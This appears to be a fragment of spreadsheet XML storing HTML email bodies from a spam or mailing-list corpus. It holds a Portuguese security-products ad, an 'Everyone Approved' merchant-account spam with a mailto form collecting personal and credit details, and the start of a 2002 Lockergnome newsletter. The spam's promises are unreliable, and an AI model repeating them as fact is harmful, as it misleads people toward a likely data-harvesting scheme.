 &lt;p&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;Outros
 produtos&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;ul&gt;
 &lt;li&gt;
 &lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;Escuta
 telef&amp;ocirc;nica&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;Alarmes&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;Cameras
 verdadeiras&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;center&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;Trava de C&amp;acirc;mbio&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;img SRC="http://www.seg1000.hpg.com.br/travacambio.jpg" &gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;R$ 38,00&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;Frete incluso&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;Ao
 mesmo tempo trava a alavanca&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;do
 c&amp;acirc;mbio e do freio de m&amp;atilde;o.&amp;nbsp;&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;Fabricada
 em a&amp;ccedil;o carbono e ferro,&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;pintura
 eletrost&amp;aacute;tica.&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;Fechadura
 Tetra&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;Para
 ver outros modelos ou obter mais&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;detalhes
 clique aqui e visite nossa loja.&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &amp;nbsp;&amp;nbsp;&amp;nbsp; Para se retirar do cadastro, favor responder sem assunto.
 &lt;br&gt;&amp;nbsp;
 &lt;/body&gt;
 &lt;/html&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Second Chance #5182
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;x-html&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;FREE Computer With Merchant Account Setup&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;b&gt;COMPLETE CREDIT CARD PROCESSING SYSTEMS FOR YOUR BUSINESS. INTERNET -  HOME
 BASED -  MAIL ORDER -  PHONE ORDER&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;Do you accept credit cards? Your competition does!&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;Everyone Approved - Credit Problems OK!&lt;br&gt;
 Approval in less than 24 hours!&lt;br&gt;
 Increase your sales by 300%&lt;br&gt;
 Start Accepting Credit Cards on your website!&lt;br&gt;
 Free Information, No Risk, 100% confidential.&lt;br&gt;
 Your name and information will not be sold to third parties!&lt;br&gt;
 Home Businesses OK!  Phone/Mail Order OK!&lt;br&gt;
 No Application Fee, No Setup Fee!&lt;br&gt;
 Close More Impulse Sales!&lt;br&gt;
 &lt;br&gt;
 &lt;/p&gt;
 &lt;div align="center"&gt;
   &lt;table border="0" cellspacing="0" width="85%"&gt;
     &lt;tr&gt;
       &lt;td width="100%"&gt;
         &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Times New Roman" size="5" color="#CC0000"&gt;Everyone Approved!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face="Times New Roman"&gt; Good Credit or Bad!&amp;nbsp; To apply today, please fill out
         the express form below. It
 contains all the information we need to get your account approved. For area's
 that do not apply to you please put &amp;quot;n/a&amp;quot; in the box.&lt;br&gt;
 &lt;br&gt;
 Upon receipt, we'll fax you with all of the all Bank Card Application
 documents necessary to establish your Merchant Account. Once returned we can
 have your account approved within 24 hours.&lt;br&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
         &lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;table border="10" cols="3" width="385"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td align="center" bgColor="#990000" width="119"&gt;&lt;b&gt;&lt;font color="#ffff00" face="Arial,Helvetica" size="3"&gt;Service&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align="center" bgColor="#990000" width="160"&gt;&lt;b&gt;&lt;font color="#ffff00" face="Arial,Helvetica" size="3"&gt;Industry
         Standard&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align="center" bgColor="#990000" width="66"&gt;
         &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#ffff00" face="Arial,Helvetica" size="3"&gt;US&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor="#ffff00" width="119"&gt;&lt;b&gt;&lt;font face="Arial,Helvetica" size="2"&gt;Site
         Inspection&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align="middle" width="160"&gt;&lt;b&gt;&lt;font size="2"&gt;$50 - $75&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="66"&gt;&lt;b&gt;&lt;font color="#3333ff" face="Arial,Helvetica" size="2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor="#ffff00" width="119"&gt;&lt;b&gt;&lt;font face="Arial,Helvetica" size="2"&gt;Shipping&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align="middle" width="160"&gt;&lt;b&gt;&lt;font size="2"&gt;$50 - $75&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="66"&gt;&lt;b&gt;&lt;font color="#3333ff" face="Arial,Helvetica" size="2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor="#ffff00" width="119"&gt;&lt;b&gt;&lt;font face="Arial,Helvetica" size="2"&gt;Warranty&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align="middle" width="160"&gt;&lt;b&gt;&lt;font size="2"&gt;$10 Per Month&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="66"&gt;&lt;b&gt;&lt;font color="#3333ff" face="Arial,Helvetica" size="2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor="#ffff00" width="119"&gt;&lt;b&gt;&lt;font face="Arial,Helvetica" size="2"&gt;Sales
         Receipts&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align="middle" width="160"&gt;&lt;b&gt;&lt;font size="2"&gt;$10 - $50&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="66"&gt;&lt;b&gt;&lt;font color="#3333ff" face="Arial,Helvetica" size="2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor="#ffff00" width="119"&gt;&lt;b&gt;&lt;font face="Arial,Helvetica" size="2"&gt;Fraud
         Screening&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;/center&gt;
     &lt;td align="middle" width="160"&gt;
       &lt;p align="left"&gt;&lt;font size="2"&gt;&lt;b&gt;$.50 - $1.00&lt;/b&gt;&lt;br&gt;
       &lt;b&gt;Per Transaction&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
 &lt;center&gt;
 &lt;td width="66"&gt;&lt;b&gt;&lt;font color="#3333ff" face="Arial,Helvetica" size="2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor="#ffff00" width="119"&gt;&lt;b&gt;&lt;font face="Arial,Helvetica" size="2"&gt;Amex Set
         Up&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align="middle" width="160"&gt;&lt;b&gt;&lt;font size="2"&gt;$50 - $75&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="66"&gt;&lt;b&gt;&lt;font color="#3333ff" face="Arial,Helvetica" size="2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor="#ffff00" width="119"&gt;&lt;b&gt;&lt;font face="Arial,Helvetica" size="2"&gt;24 Hour&amp;nbsp;Help
         Line&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align="middle" width="160"&gt;&lt;b&gt;&lt;font size="2"&gt;$10 Month&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="66"&gt;&lt;b&gt;&lt;font color="#3333ff" face="Arial,Helvetica" size="2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor="#ffff00" width="119"&gt;&lt;b&gt;&lt;font face="Arial,Helvetica" size="2"&gt;Security
         Bond&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align="middle" width="160"&gt;&lt;font size="2"&gt;&lt;b&gt;$5000- $10,000&lt;/b&gt;&lt;br&gt;
         &lt;b&gt;Or More&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;td width="66"&gt;&lt;b&gt;&lt;font color="#3333ff" face="Arial,Helvetica" size="2"&gt;NONE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;&lt;p&gt;
 &lt;div align="center"&gt;
   &lt;table border="0" cellspacing="0" width="85%"&gt;
     &lt;tr&gt;
       &lt;td width="100%"&gt;
         &lt;p&gt;&lt;font face="Arial,Helvetica" size="2"&gt;&lt;b&gt;This is a &lt;font color="#3333ff"&gt;No
         Obligation Qualification Form&lt;/font&gt; and is your first step to&lt;font color="#cc0000"&gt;
         accepting credit cards.&lt;/font&gt; By filling out this form you will &lt;font color="#3333ff"&gt;&amp;quot;not
         enter&amp;quot;&lt;/font&gt; in to any &lt;font color="#006600"&gt;obligations or
         contracts &lt;/font&gt;with us. We will use it to determine the best program
         to offer you based on the information you provide. You will be contacted by one of our representatives within 1-2 business days to go over the rest of your account set up.&lt;/b&gt;&lt;/font&gt;
         &lt;p align="center"&gt;&lt;font face="Arial,Helvetica" size="2"&gt;&lt;b&gt;&lt;font color="#cc0000"&gt;Note:&lt;/font&gt;&amp;nbsp;
         All Information Provided To Us &lt;font color="#cc0000"&gt;Will Remain 100%
         Confidential&lt;/font&gt;
         !!&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;table border="0"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td width="100%"&gt;
         &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#000099" face="arial" size="+2"&gt;Apply
         Free With No Risk!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
   &lt;/center&gt;
 &lt;/form&gt;
 &lt;div align="left"&gt;
   &lt;table border="0" width="95%"&gt;
     &lt;tr&gt;
       &lt;td width="100%"&gt;
         &lt;p align="center"&gt;&lt;b&gt;&lt;i&gt;&lt;font size="2" color="#CC0000"&gt;Please fill out the
         express application form completely.&lt;br&gt;Incomplete information may prevent us from properly
         processing your application.&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;form name="form"
   method="post"
   action="mailto:ieg007@yahoo.com?SUBJECT=Form"
   enctype="text/plain"
  &lt;tr&gt;
 &lt;div align="left"&gt;
   &lt;table border="0" width="95%"&gt;
     &lt;tr&gt;
       &lt;td width="61%" align="right"&gt;&lt;font size="2"&gt;&lt;b&gt;Your Full Email Address:&lt;/b&gt;&lt;br&gt;
         &lt;font color="#ff0000"&gt;be sure to use your full address &lt;/font&gt;(i.e.&lt;font color="#ff0000"&gt;
         &lt;/font&gt;user@domain.com)&lt;/font&gt;&lt;/td&gt;
       &lt;td width="39%" align="center"&gt;&lt;input type="text" name="user_email" size="29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="61%" align="right"&gt;&lt;b&gt;&lt;font size="2"&gt;Your Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="39%" align="center"&gt;&lt;input type="text" name="Applicant_Name" size="29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="61%" align="right"&gt;&lt;b&gt;&lt;font size="2"&gt;Business Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="39%" align="center"&gt;&lt;input type="text" name="Business_Name" size="29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="61%" align="right"&gt;&lt;b&gt;&lt;font size="2"&gt;Business Phone Number:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="39%" align="center"&gt;&lt;input type="text" name="Business_Phone" size="29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="61%" align="right"&gt;&lt;b&gt;&lt;font size="2"&gt;Home Phone Number:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="39%" align="center"&gt;&lt;input type="text" name="HomePhone" size="29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="61%" align="right"&gt;&lt;b&gt;&lt;font size="2"&gt;Type of Business:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="39%"&gt;
         &lt;div align="left"&gt;
           &lt;table border="0" width="95%"&gt;
             &lt;tr&gt;
               &lt;td width="12%" align="center"&gt;&lt;input type="radio" value="retail" name="Type_Business"&gt;&lt;/td&gt;
               &lt;td width="88%"&gt;&lt;font size="2"&gt;&lt;b&gt;Retail Business&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width="12%" align="center"&gt;&lt;input type="radio" value="mailorder" name="Type_Business"&gt;&lt;/td&gt;
               &lt;td width="88%"&gt;&lt;font size="2"&gt;&lt;b&gt;Mail Order Business&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width="12%" align="center"&gt;&lt;input type="radio" value="internet" name="Type_Business"&gt;&lt;/td&gt;
               &lt;td width="88%"&gt;&lt;font size="2"&gt;&lt;b&gt;Internet Based Business&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="61%" align="right"&gt;&lt;b&gt;&lt;font size="2"&gt;Personal Credit Rating:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="39%"&gt;
         &lt;div align="left"&gt;
           &lt;table border="0" width="95%"&gt;
             &lt;tr&gt;
               &lt;td width="12%" align="center"&gt;&lt;input type="radio" value="excellent" name="Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width="88%"&gt;Excellent&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width="12%" align="center"&gt;&lt;input type="radio" value="good" name="Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width="88%"&gt;Good&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width="12%" align="center"&gt;&lt;input type="radio" value="fair" name="Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width="88%"&gt;Fair&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width="12%" align="center"&gt;&lt;input type="radio" value="poor" name="Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width="88%"&gt;Poor&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="61%" align="right"&gt;&lt;b&gt;&lt;font size="2"&gt;How Soon Would You Like a Merchant
         Account?&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width="39%"&gt;
         &lt;p align="center"&gt;&lt;input type="text" name="How_Soon" size="29"&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="100%" colspan="2"&gt;
         &lt;div align="center"&gt;
           &lt;center&gt;
           &lt;table border="0" width="13%"&gt;
             &lt;tr&gt;
               &lt;td width="100%"&gt;
                 &lt;p align="center"&gt;&lt;input type="submit" value="Submit" name="B1"&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
       &lt;/td&gt;&lt;/form&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;&lt;br&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="3" cellspacing="0" width="85%" bgcolor="#E8E8E8" bordercolor="#C0C0C0"&gt;
     &lt;tr&gt;
       &lt;td width="100%" bgcolor="#E8E8E8"&gt;&lt;font size="2"&gt;&lt;b&gt;Your information is confidential, it will not be sold or used for any other purpose, and you are under no obligation.
         Your information will be used solely for the purpose of evaluating your business or website for a merchant account so that you may begin accepting credit card payments.&lt;/b&gt;&lt;/font&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/form&gt;
 &lt;p align="center"&gt;
 &lt;br&gt;&lt;b&gt;&lt;font size="3" color="#FF0000"&gt;List
  Removal/OPT-OUT Option&lt;/font&gt;&lt;/b&gt;
  &lt;br&gt;&lt;b&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;&lt;a
  href="mailto:ieg016@yahoo.com?subject=remove"&gt;Click
  Here&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;m
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;/x-html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020722.html"&gt;
       http://www.lockergnome.com/issues/digitalmedia/20020722.html
       &lt;/a&gt;
       To unsubscribe, please e-mail the following address:
       leave-lgmedia-2534370N@sprocket.lockergnome.com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scrollbar-3dlight-color: #DEE8EC; scrollbar-arrow-color: #000000; scrollbar-base-color: #007C7A; scrollbar-darkshadow-color: #507686; scrollbar-face-color: #A9C4CF; scrollbar-highlight-color: #DEE8EC; scrollbar-shadow-color: #507686 }
  a:link    { COLOR: #0000FF; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { color: #000000; TEXT-DECORATION: none }
  a:hover   { color: #26343A; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.news    { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 18pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 3px solid; BORDER-LEFT: #DEE8EC 3px solid; BORDER-RIGHT: #507686 3px solid; BORDER-TOP: #DEE8EC 3px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020722 Lockergnome Digital Media&lt;/title&gt;&lt;/head&gt;
 &lt;body     MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"     style="BACKGROUND-POSITION: right top; BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0" text="#26343A" alink="#008080" link="#0000FF" vlink="#26343A"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" background="http://images.lockergnome.com/images/dn.back.top-r1.gif" --&gt;
  &lt;table width="100%" border="0" cellspacing="0" cellpadding="7" align="CENTER" valign="MIDDLE"&gt;
   &lt;tr&gt;&lt;td background="http://images.lockergnome.com/images/issue/top-left.gif" nowrap valign="middle" align="center" colspan="2"&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;!--#include virtual="/include/banner.txt" --&gt;
  &lt;center&gt;
  &lt;a href="http://www.lockergnome.com/"&gt;&lt;img src="http://images.lockergnome.com/images/gnomedaily.gif" width="50" height="60" hspace="5" alt="Lockergnome" border="0"&gt;&lt;/a&gt;
 &lt;a target="_blank" href="http://www.SellShareware.com/ProgramInfo.asp?AfID=10519&amp;PrID=30818"&gt;&lt;img src="http://www.lockergnome.com/images/ads/textaloud468x60.gif" width="468" height="60" alt="See You at Gnomedex 2002!" border="0"&gt;&lt;/a&gt;
  &lt;br&gt;
  &lt;/center&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="news"&gt;
 &amp;nbsp;07.22.2002 MediaREPORT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;TextAloud MP3 converts text to speech and to MP3&lt;/b&gt; 
 Listen to email, Web pages, e-books, and more on your PC or 
 portable MP3 player.  As featured in PC Magazine, The New 
 York Times, and on CNN.  Now available with optional
 AT&amp;T Natural Voices, the most advanced computer speech for your PC. 
 &lt;a href="http://wcarchive.cdrom.com/pub/bws/bws_44/TA_demo.mp3" target="_blank"&gt;Listen to a demo&lt;/a&gt;, then 
 &lt;a href="http://www.SellShareware.com/ProgramInfo.asp?AfID=10519&amp;PrID=30818"&gt;download your trial copy&lt;/a&gt;.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Lockergnome's Guide to Converting Vinyl LPs to CD is no longer free. 
 Over the last 10 days, almost 4,000 people downloaded the free tome. 
 Of that 4,000, close to half put in a fake e-mail address, resulting 
 in a ridiculous number of bounce messages in my inbox. Add to that 
 the fact that several of the clever individuals used other people's 
 real addresses, which then amounted to complaints of spam from the 
 address owners. It's not worth providing a free service if it causes 
 Lockergnome to be labeled a spammer as a result. The crowning gem was 
 the in-duh-vidual who used the name A** Hole and Chris's personal 
 address to download the PDF. On a more positive note, the guide is 
 &lt;a href="http://www.gnometomes.com/tome/001962.html"&gt;now available in all six formats&lt;/a&gt;,  
 for the minimal price of $5, complete with some additional content 
 based on a couple reader suggestions.
 &lt;p&gt;
 Chris may have an obsession with Peets coffee, but I'll bet he's never 
 been the daily special. On my visit to St. Louis, for the 
 &lt;a href="http://www.sic.org"&gt;SIC&lt;/a&gt;, I 
 started every morning with a walk to the West Port Starbucks. 
 Apparently my morning ritual was a source of entertainment for the 
 employees, which evolved into discussions of a reality based TV show 
 based on the concept of stalking me. I've even got the 
 &lt;a href="http://www.lockergnome.com/images/jakepics/starbucks.jpg"&gt;incriminating evidence&lt;/a&gt; 
 to prove it.
 &lt;p&gt;
 The SIC provided me the opportunity to see some cool updates to a couple 
 titles, in addition to being introduced to some useful audio oriented 
 titles I'd never seen before. Expect a number of reviews over the next 
 several weeks, as well as extensive coverage of last week's events in 
 St. Louis in the annual SIC special issue. Lori managed to score a few 
 more Gnomedex giveaways while we were in attendance, so those of you who 
 sign up will be coming home with even more goodies, which, by the way, 
 aren't of the stressball and pen variety -- we're talking software 
 titles with reg codes.
 &lt;p align="right"&gt;&lt;font style="font-size: 22pt" face="Jake Ludington, Chris Pirillo, Comic Sans MS" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;
 &lt;!-- PRODUCER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePRODUCER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;NVIDIA CONTEST - SIGGRAPH 2002&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.siggraph.org/s2002/flashhome.html"&gt;http://www.siggraph.org/s2002/flashhome.html&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" href="http://www.nvidia.com/"&gt;http://www.nvidia.com/&lt;/a&gt;&lt;p&gt;
 If you're in San Antonio July 23-25, for this year's Siggraph conference, 
 you'll want to stop by the nVidia booth (#19102). Every 30 minutes 10 
 people will be competing for a NVIDIA Quadro4 750 XGL professional 
 graphics solution, using NVIDIA-provided traditional art materials such 
 as charcoal, pastels, crayons and paper to create something artistic. 
 All artwork must be original, unpublished work. Artwork must also
 incorporate the NVIDIA logo and be created on-site at SIGGRAPH during the
 10-minute contest round. Judging will be based on artistry; creativity and
 originality; technical merit; and theme incorporation. Artwork will not be
 returned to contestants and will become the property of NVIDIA as outlined
 in the contest registration form. Even if you don't win, you'll still get a free t-shirt.
